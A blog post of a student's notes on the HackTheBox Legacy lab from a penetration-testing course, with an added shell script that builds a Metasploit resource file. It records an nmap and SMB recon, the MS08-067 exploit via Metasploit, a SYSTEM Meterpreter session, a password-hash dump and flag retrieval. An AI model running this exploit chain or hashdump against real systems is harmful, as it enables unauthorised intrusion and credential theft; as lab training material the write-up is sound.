TCM PEH Hacking Legacy Notes
HTB Legacy
I'm just going to record his commands to derive a methodology.
nmap -A -T4 -p- 10.10.10.4
Noted port 139
Noted port 445
Noted Windows XP OS
Noted smb-security-mode
smbclient -L \\\\10.10.10.4\\   (backslashes doubled so the shell passes \\10.10.10.4\ through; smbclient -L //10.10.10.4 is the same thing)
enter (blank password at the prompt)
dead end
msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set RHOSTS 10.10.10.4   (the option is RHOSTS; newer msfconsole accepts rhost as an alias)
options
exploit
Noted Windows XP SP3
Googled Windows XP SP3 exploit
Opened exploit-db link
Opened rapid7 link
Noted the rapid7 link is the Metasploit module for MS08-067 (exploit/windows/smb/ms08_067_netapi)
use exploit/windows/smb/ms08_067_netapi
options
set RHOSTS 10.10.10.4
show targets
exploit
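The steps above (note the SMB ports, note the OS, fingerprint with smb_version, then pick ms08_067_netapi) are the methodology. As an added example that is not part of the course or the original notes, this small POSIX sh script turns that decision into something repeatable: it reads nmap's grepable output (-oG) and writes a Metasploit resource file that runs smb_version and, when port 445 is open and the OS guess looks like XP/2000/2003, the module's check command. The nmap output embedded below is constructed to look like Legacy; the function names and the legacy.rc file name are my own.

```shell
#!/bin/sh
# Added example, not from the TCM course or the original notes.
# Usage with a real scan:
#   nmap -A -T4 -p- -oG legacy.gnmap 10.10.10.4
#   build_rc "$(cat legacy.gnmap)" 10.10.10.4 > legacy.rc && msfconsole -q -r legacy.rc

# Constructed -oG output standing in for a real scan of 10.10.10.4.
# -oG fields are tab-separated: Host ... Ports: ... OS: ... Seq Index: ...
SAMPLE_GNMAP=$(printf 'Host: 10.10.10.4 ()\tStatus: Up\nHost: 10.10.10.4 ()\tPorts: 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Windows XP microsoft-ds/\tOS: Microsoft Windows XP SP2 or SP3\tSeq Index: 9\n')

# Print the open SMB ports (139, 445) found in -oG output, one per line.
# Each Ports entry is port/state/proto/owner/service/rpc/version/
smb_open_ports() {
  printf '%s\n' "$1" | awk -F'\t' '
    /Ports:/ {
      for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) {
        sub(/^Ports: /, "", $i)
        n = split($i, p, /, */)
        for (j = 1; j <= n; j++) {
          split(p[j], f, "/")
          if ((f[1] == "139" || f[1] == "445") && f[2] == "open") print f[1]
        }
      }
    }'
}

# Print nmap's OS guess (the "OS:" field, present when -O or -A was used).
os_guess() {
  printf '%s\n' "$1" | awk -F'\t' '
    { for (i = 1; i <= NF; i++) if ($i ~ /^OS: /) { sub(/^OS: /, "", $i); print $i; exit } }'
}

# Emit an msfconsole resource script for the host. Always fingerprints with
# smb_version; only queues the ms08_067_netapi *check* (not exploit) when
# 445 is open and the OS guess is in the MS08-067 range. Returns 1 when
# there is no 445 to work with. Runs in a subshell so variables stay local.
build_rc() (
  gnmap=$1; rhost=$2
  ports=$(smb_open_ports "$gnmap")
  os=$(os_guess "$gnmap")
  case " $(echo $ports) " in
    *" 445 "*) ;;
    *) printf '# %s: no open 445, ms08_067 does not apply\n' "$rhost"; exit 1 ;;
  esac
  printf 'use auxiliary/scanner/smb/smb_version\nset RHOSTS %s\nrun\n' "$rhost"
  case $os in
    *"Windows XP"*|*"Windows 2000"*|*"Server 2003"*)
      printf 'use exploit/windows/smb/ms08_067_netapi\nset RHOSTS %s\ncheck\n' "$rhost" ;;
  esac
)

# Demo on the constructed scan.
build_rc "$SAMPLE_GNMAP" 10.10.10.4
```

The script stops at check on purpose: MS08-067 is a remote overflow in the Server service, and firing it at the wrong target or service pack can crash the box instead of giving a shell, so confirm "The target is vulnerable" from check before typing exploit yourself.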
Meterpreter session 1 opened
getuid
Noted NT AUTHORITY\SYSTEM
sysinfo
Noted Architecture x86, matching the x86 Meterpreter payload (no need to migrate to a process of a different architecture)
hashdump
shell
cd "c:\documents and settings"
cd john\desktop
type user.txt
cd "c:\documents and settings\Administrator\desktop"   (absolute path; from john\desktop the relative form is ..\..\Administrator\desktop)
type root.txt
ctrl+c twice: first to terminate the shell channel, then to back out of the Meterpreter session
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!